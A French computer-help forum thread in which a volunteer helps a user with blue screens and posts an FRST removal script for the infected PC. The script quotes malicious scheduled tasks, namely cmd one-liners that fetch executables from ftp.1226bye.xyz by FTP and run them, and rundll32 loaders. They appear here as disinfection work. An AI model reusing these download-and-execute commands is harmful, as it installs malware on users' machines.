> Tous les forums > Forum Analyse de rapports et désinfection
 Problème écran bleuSujet résolu
Ajouter un message à la discussion
Page : [1] 
Page 1 sur 1
seb72
  Posté le 11/02/2019 @ 18:52 
Aller en bas de la page 
Nouvel astucien

Bonjour,

Depuis plusieurs jours je bénéficie d'un écran bleu de la mort quelques dizaines de secondes après l'ouverture du PC. Il s'éteint. Je ne sais pas si c'est le disque dur qui est HS. Je travaille en mode sans échec ce qui interdit les mises à jours de Windows...

J'ai plusieurs rapports que je vous envoie

Merci

https://www.cjoint.com/c/IBlo4dfJV58

https://www.cjoint.com/c/IBkrC1D6kK8
 
https://www.cjoint.com/c/IBknPYQt028

https://www.cjoint.com/c/IBikJepPgm8
 
https://www.cjoint.com/c/IBhqNZa6ff8
 
https://www.cjoint.com/c/IBhqNsDsRo8
 
https://www.cjoint.com/c/IBhqiuMAey8


Publicité
clbugnot
 Posté le 11/02/2019 à 19:53 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
  Grand Maître astucien

Bonjour seb72, bienvenue sur PC Astuces !

Ce sujet serait mieux sur le forum Sécurité. Clique l'icone dans le bandeau au-dessus de ton message et, dans la fenêtre qui s'affiche, demande au modérateur de déplacer ton sujet vers le forum indiqué puis clique sur Envoyer.

Cordialement.

seb72
 Posté le 12/02/2019 à 09:35 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Nouvel astucien

Bonjour !

Personne n'aurait une petite idée pour m'aider ?

Grand merci

pcastuces
 Posté le 12/02/2019 à 09:38 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Equipe PC Astuces
Bonjour,

Le sujet a été déplacé par la modération dans le forum Sécurité qui semble plus adéquat.

Vous pouvez continuer la discussion à la suite de ce message.

A bientôt.
Fill
 Posté le 12/02/2019 à 10:20 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Bonjour,

Bonjour,

Je vais t'assister au cours de cette désinfection. Si tu es d'accord, on va fixer quelques règles pour que la désinfection soit efficace.

  • Si tu as ouvert un sujet similaire sur un autre forum, merci de me prévenir afin que je ne fasse pas de recherches inutiles et par souci d'efficacité (on ne prend pas rendez-vous dans 2 garages pour le même problème mécanique),
  • Si tu as des cracks ou des keygens, tu les supprimes,
  • Si tu as un windows illégal, je ne désinfecte pas.
  • Si tu as windows Vista, XP ou une version antérieure, merci de me le dire. En effet, ces versions de windows ne sont plus mises à jour. Cela signifie qu'elles sont faillibles, et une désinfection n'a pas de sens, car le risque de ré-infection utlérieure est très élevé. Il faut alors acheter une version plus récente de windows si le pc n'est pas trop ancien ou alors migrer vers une distribution Linux.
  • Tu poursuis la désinfection jusqu'au bout, même si tu constates une amélioration rapide, et de préférence sur un temps restreint (pas une réponse tous les 3 jours), sinon, cela ne sert à rien.
  • La désinfection comprend un diagnostic, un nettoyage, la suppression des outils utilisés et des conseils pour éviter des ré-infections futures, mettre le système à jour, créer des sauvegardes etc...
  • Quelques-uns des outils utilisés peuvent faire réagir certains antivirus, car ils sont puissants et destructeurs s'ils sont mal utilisés.
  • Pour me permettre d'établir un diagnostic, peux-tu suivre ces consignes et éditer les rapports demandés ? (ZHPDiag.txt, FRST.txt, Addition.txt, Shortcut.txt)
  • Si tu as des questions, n'hésite pas.

Peux-tu suivre ces consignes stp ?

https://forum.pcastuces.com/recuperer_les_minidumps_en_cas_ecran_bleu_bsod-f31s58.htm

Fill

Fill
 Posté le 12/02/2019 à 10:31 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Avec qui as-tu été suivi pour réaliser le fix de FRST ?

seb72
 Posté le 12/02/2019 à 10:52 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Nouvel astucien

Bonjour Fill

Voici les rapports

https://www.cjoint.com/c/IBmjUKaflq8

https://www.cjoint.com/c/IBmjVqwz0U8

https://www.cjoint.com/c/IBmjVVL0rp8

https://www.cjoint.com/c/IBmjWo1rQU8

J'ai été aidé par Didier sur le forum de Nicolas Coolman, sans résultats.

Merci

pcastuces
 Posté le 12/02/2019 à 11:28 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Equipe PC Astuces
Bonjour,

Le sujet a été déplacé par la modération dans le forum Analyse de rapports et désinfection qui semble plus adéquat.

Vous pouvez continuer la discussion à la suite de ce message.

A bientôt.
seb72
 Posté le 12/02/2019 à 11:29 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Nouvel astucien

Bien compris !

Publicité
Fill
 Posté le 12/02/2019 à 18:33 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Peux-tu suivre ces consignes stp ?

https://forum.pcastuces.com/recuperer_les_minidumps_en_cas_ecran_bleu_bsod-f31s58.htm

Bonsoir,

Tu n'as pas fait ce qui précède.

Fill

seb72
 Posté le 12/02/2019 à 18:42 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Nouvel astucien

Désolé Fill je n'avais pas vu.

https://www.cjoint.com/c/IBmrOCO0qs8

Tout en sachant que j'ouvre le PC depuis quelques jours directement en mode sans échec.

Fill
 Posté le 12/02/2019 à 18:44 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Re,

A priori, l'archive est corrompue ou vide : elle fait 0 ko.

seb72
 Posté le 12/02/2019 à 18:46 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Nouvel astucien

Bizarre, elle fait 353ko

Fill
 Posté le 12/02/2019 à 18:54 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Re,

Tu peux m'envoyer l'archive à cette adresse : 35be3e84@opayq.com

Fill

Fill
 Posté le 13/02/2019 à 12:17 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Bonjour,

Parviens-tu à récupérer les mini-dumps ?

Fill

seb72
 Posté le 13/02/2019 à 14:59 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Nouvel astucien

Bonjour,

Je ne comprend pas la question.

Seb

Fill
 Posté le 13/02/2019 à 15:42 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Bonjour,

Les minidumps correspondent aux fichiers enregistrant les rapports de plantage en cas d'écran bleu. L'archive que tu m'as faite parvenir ne me permet pas de les lire. Peux-tu recommencer l'envoi vers l'adresse mail indiquée au dessus ? Tu peux mettre directement en pièce jointe ces fichiers dans ton message. Ils sont situés dans C:\Windows\Minidump

Fill

Publicité
seb72
 Posté le 13/02/2019 à 15:51  

Message supprimé par la modération

Fill
 Posté le 13/02/2019 à 16:41 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Re,

J'ai bien reçu ton mail. Commence par enlever ton adresse mail du forum pour éviter les spams.

Je regarde cela.

Tu sembles avoir été victime d'un ramsomware il y a quelques années.

En attendant, fais ceci :

Nous avons besoin de corriger certains éléments que FRST a trouvés.

  • Ouvre le programme FRST en faisant un clic droit sur son icône et en l'exécutant en tant qu'administrateur.
  • Copie le contenu de la zone Code ci-dessous. Pour ce faire, sélectionne le contenu de la zone texte située ci-dessous et fais un clic droit en choisissant "Copier" :
Start::
CreateRestorePoint:
EmptyTemp:
RemoveProxy:
VirusTotal: c:\windows\help\lsmosee.exe;c:\windows\update.exe;C:\Windows\SysWOW64\scrobj.dll;C:\Windows\system32\pcalua.exe
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.0.19 - McAfee, Inc.)
Task: {08166AD7-BC80-4E8A-B3CE-3FB38D87E667} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {5080C933-E97E-44E2-A412-7272318EEC7F} - System32\Tasks\ROC_REG_JAN_DELETE => C:\ProgramData\AVG January 2013 Campaign\ROC.exe (AVG Technologies -> )
Task: {599FA173-259C-480B-960A-0EA098C5D843} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {6C997686-58F9-4B03-BE3D-3339C1A0E575} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {720BCE42-65C2-412C-A2B9-1861E84212CF} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {9AC69DB8-8F01-4610-AA8F-6ACA64D8F283} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {9C60CDEA-6C69-45C8-998E-5445F7824C18} - System32\Tasks\{A5FC40B8-EA10-4A89-9162-B56E9B23CE76} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\jre-8u60-windows-i586-iftw.exe" -d "C:\Program Files (x86)"
Task: {C25AE738-A94C-4A11-B914-392780348AA3} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe (AVAST Software s.r.o. -> AVAST Software)
Task: {C6AA86B5-3B75-422F-B62E-B4895E28B2B1} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {E0385589-8F38-4542-8B0A-8B1200B16292} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {ECFA415A-0101-4341-BFC8-6F10A12D27D3} - \{B0782209-B4AC-4BDA-A6B6-04641A0F5499} -> Pas de fichier <==== ATTENTION
Task: C:\Windows\Tasks\AdwCleaner_onReboot.job => C:\Users\seb\Desktop\adwcleaner_7.2.7.0.exe
Task: C:\Windows\Tasks\ROC_REG_JAN_DELETE.job => C:\ProgramData\AVG January 2013 Campaign\ROC.exe
c:\windows\debug\item.dat
C:\ProgramData\AVG January 2013 Campaign
C:\Program Files (x86)\AVAST Software
C:\Program Files\Common Files\Avast Software
c:\windows\debug\ok.dat
c:\windows\debug\item.dat
HKLM-x32\...\Run: [start] => C:\Windows\SysWOW64\scrobj.dll [173568 2009-07-14] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
HKLM-x32\...\RunOnce: [wextract_cleanup0] => rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\seb\AppData\Local\Temp\IXP000.TMP\" <==== ATTENTION
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\Run: [SMSetup] => "C:\Users\seb\AppData\Local\Temp\B5A4728A-4F02-497E-A47F-8F32BF943E7C\SMSetup.exe" /cnid 926458 /fpd /dsie /dsff /dsgc /hp /wait /ntp_ie /ms /restart <==== ATTENTION
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_101_ActiveX.exe [1456128 2018-12-05] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\Policies\Explorer: [TaskbarNoNotification] 1
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-538220665-914173731-789976379-1000\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2871808 2011-02-25] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
FF SearchPlugin: C:\Users\seb\AppData\Roaming\Mozilla\Firefox\Profiles\3h7ocm78.default\searchplugins\bing-lavasoft-ff59.xml [2018-12-31]
FF HKLM-x32\...\Thunderbird\Extensions: [avgthb@avg.com] - C:\Program Files (x86)\AVG\AVG2012\Thunderbird => non trouvé(e)
2019-02-11 09:32 - 2019-02-11 09:32 - 000003504 _____ C:\Windows\System32\Tasks\Mysa3
2019-02-11 09:32 - 2019-02-11 09:32 - 000003424 _____ C:\Windows\System32\Tasks\Mysa2
2019-02-11 09:32 - 2019-02-11 09:32 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2019-02-11 09:32 - 2019-02-11 09:32 - 000003186 _____ C:\Windows\System32\Tasks\ok
2019-02-10 11:10 - 2019-02-10 11:10 - 000000284 _____ C:\Windows\Tasks\AdwCleaner_onReboot.job
2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.HTML
2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.PNG
2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.TXT
2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Roaming\HELP_DECRYPT.URL
2015-09-09 17:33 - 2015-09-09 17:33 - 000009130 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.HTML
2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.PNG
2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.TXT
2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Roaming\Microsoft\HELP_DECRYPT.URL
2015-09-09 17:33 - 2015-09-09 17:33 - 000047841 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.PNG
2015-09-09 17:33 - 2015-09-09 17:33 - 000004756 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.TXT
2015-09-09 17:33 - 2015-09-09 17:33 - 000000300 _____ () C:\Users\seb\AppData\Local\HELP_DECRYPT.URL

NOTE: Ces lignes ont été écrites spécialement pour cet utilisateur, pour être utilisées exclusivement sur ce PC. Exécuter ces instructions sur une autre machine pourrait endommager le système d'exploitation.

  • Appuie sur CTRL+Y et colle les lignes copiées ci-dessous dnas la fenêtre du bloc-note en faisant CTRL+V.
  • Appuie sur CTRL+S pour faire une sauvegarde du fichier de correction, qui doit s'enregistrer au même endroit que le programme FRST
  • Clique une seule fois sur le bouton "Corriger" et attends. L'outil va peut-être forcer le redémarrage ou te demander de redémarrarer le pc. Dans ce cas-là, tu acceptes.
  • L'outil va créer un rapport de correction Fixlog.txt à l'endroit où il a été lancé. Copie/colle ce rapport dans ta réponse.

Fill

Fill
 Posté le 13/02/2019 à 21:29 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Bonsoir,

Parviens-tu à réaliser les opérations demandées ?

Fill

Fill
 Posté le 16/02/2019 à 16:29 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Groupe Sécurité

Dans mon message du 12/02 à 10:20, j'avais écrit :

Tu poursuis la désinfection jusqu'au bout, même si tu constates une amélioration rapide, et de préférence sur un temps restreint (pas une réponse tous les 3 jours), sinon, cela ne sert à rien.

Faute de retour, je classe le sujet.

Fill

Page : [1] 
Page 1 sur 1

Vous devez être connecté pour poster des messages. Cliquez ici pour vous identifier.

Vous n'avez pas de compte ? Créez-en un gratuitement !


Sujets relatifs
[Liza33]Ecran bleu - Erreur Windows
écran bleu atikmdag.sys
[El Magnifico]écran bleu atikmdag.sys
[Pierre95]problème avec Firefox
[El Magnifico]Virus ou problème informatique ?
[Pierre95]Probleme d'imprimante, Virus?
[Pierre95]Grave problème avec HiSuite...
[TORRENT9] PROBLÈME AVEC TORRENT9 ET UTORRENT
Gros probleme avec prise d'otage PC Window 10
[G225] Problème de script, difficile ou impossible d'acces
Plus de sujets relatifs à Problème écran bleu
 > Tous les forums > Forum Analyse de rapports et désinfection